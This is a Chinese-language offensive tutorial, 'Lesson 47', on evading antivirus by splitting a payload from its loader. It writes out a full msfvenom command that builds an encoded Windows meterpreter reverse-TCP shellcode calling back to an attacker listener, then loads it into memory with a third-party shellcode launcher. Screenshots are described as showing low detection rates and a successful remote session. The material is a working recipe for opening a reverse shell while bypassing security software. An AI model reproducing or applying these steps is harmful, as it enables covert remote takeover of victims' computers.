# 第四十七课：payload分离免杀思路

目前的反病毒安全软件，常见有三种，一种基于特征，一种基于行为，一种基于云查杀。云查杀的特点基本也可以概括为特征查杀。无论是哪种，都是特别针对 PE 头文件的查杀。尤其是当 payload 文件越大的时候，特征越容易查杀。

既然知道了目前的主流查杀方式，那么反制查杀，此篇采取特征与行为分离免杀。避免 PE 头文件，并且分离行为，与特征的综合免杀。适用于菜刀下等场景，也是我在基于 windows 下为了更稳定的一种常用手法。载入内存。

## 0x00:以msf为例：监听端口

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrote-kmim9WLajq%2Fe443cf6dc02a20a342291d5c06ccec4f.jpg?generation=1551060441988004\&alt=media)

## 0x01：这里的payload不采取生成pe文件，而采取shellcode方式，来借助第三方直接加载到内存中。避免行为：

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=8080 -e x86/shikata_ga_nai -i 5 -f raw > test.c
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqpQEKbMz9tlXDy4%2F1a912494f05f8ca99edf268225e1a66f.jpg?generation=1551060444265807\&alt=media)

## 0x02:既然是shellcode方式的payload，那么一定需要借助第三方来启动，加载到内存。执行shellcode，自己写也不是很难，这里我借用一个github一个开源：

<https://github.com/clinicallyinane/shellcode_launcher/>

**作者的话：建议大家自己写shellcode执行盒，相关代码网上非常成熟。如果遇到问题，随时可以问我。**

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrovBQdTR2cpSfua%2F168b6471db08e03cbca360642e0bcb0c.jpg?generation=1551060428078526\&alt=media)

生成的payload大小如下：476字节。还是 X32位的 payload。\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwroxfHdojvJvi84W%2F92ab172a1914132282d7a5bfd14ab31d.jpg?generation=1551060457756885\&alt=media)

国内世界杀毒网：\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrozMPp1As7pApNe%2F7749133623a7d6b774e000605ce77a57.jpg?generation=1551060459886425\&alt=media)

国际世界杀毒网：\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqpWXKWbmdHDhj9w%2F663bc4d955c71bf9882c9a31761e0c14.jpg?generation=1551060440671828\&alt=media)

上线成功。\
![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwqpYPkS6M4UX8pR_%2Fbe28c1202684af6369757b813f4d9649.jpg?generation=1551060428969326\&alt=media)

> Micropoor